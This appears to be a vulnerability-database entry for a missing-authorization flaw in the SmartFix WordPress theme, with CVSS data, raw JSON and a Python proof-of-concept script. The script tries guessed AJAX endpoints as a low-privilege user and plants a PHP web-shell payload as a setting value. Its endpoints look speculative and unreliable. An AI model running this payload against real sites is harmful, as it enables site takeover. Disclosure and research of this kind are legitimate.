Security Vulnerability Report
中文
CVE-2026-32391 CVSS 5.4 MEDIUM

CVE-2026-32391

Published: 2026-03-13 19:54:55
Last Modified: 2026-04-29 10:17:04

Description

Missing Authorization vulnerability in linethemes SmartFix smartfix allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SmartFix: from n/a through < 1.2.4.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

SmartFix < 1.2.4
SmartFix from n/a through < 1.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-32391 PoC - SmartFix Broken Access Control # Target: WordPress site with SmartFix theme < 1.2.4 def exploit_smartfix(target_url, username, password): """ Exploit missing authorization in SmartFix theme. This PoC demonstrates accessing admin functions as low-privilege user. """ session = requests.Session() # Step 1: Login as low-privilege user login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) if 'wp-admin' not in response.url and 'invalid' not in response.text.lower(): print("[-] Login failed") return False print("[+] Logged in as low-privilege user") # Step 2: Access SmartFix theme settings without proper authorization # This endpoint should require admin privileges but doesn't vulnerable_endpoints = [ '/wp-admin/admin-ajax.php?action=smartfix_settings_update', '/wp-admin/admin-ajax.php?action=smartfix_save_config', '/wp-content/themes/smartfix/includes/ajax-handler.php' ] for endpoint in vulnerable_endpoints: evil_url = target_url + endpoint evil_data = { 'setting_name': 'malicious_setting', 'setting_value': '<?php system($_GET["cmd"]); ?>' } response = session.get(evil_url, params=evil_data) if response.status_code == 200: print(f"[+] Vulnerable endpoint found: {endpoint}") print(f"[+] Response: {response.text[:200]}") return True if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_smartfix(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32391", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:54.547", "lastModified": "2026-04-29T10:17:04.400", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in linethemes SmartFix smartfix allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SmartFix: from n/a through < 1.2.4."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en linethemes SmartFix smartfix permite Explotar Niveles de Seguridad de Control de Acceso Configurados Incorrectamente. Este problema afecta a SmartFix: desde n/a hasta &lt; 1.2.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/smartfix/vulnerability/wordpress-smartfix-theme-1-2-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}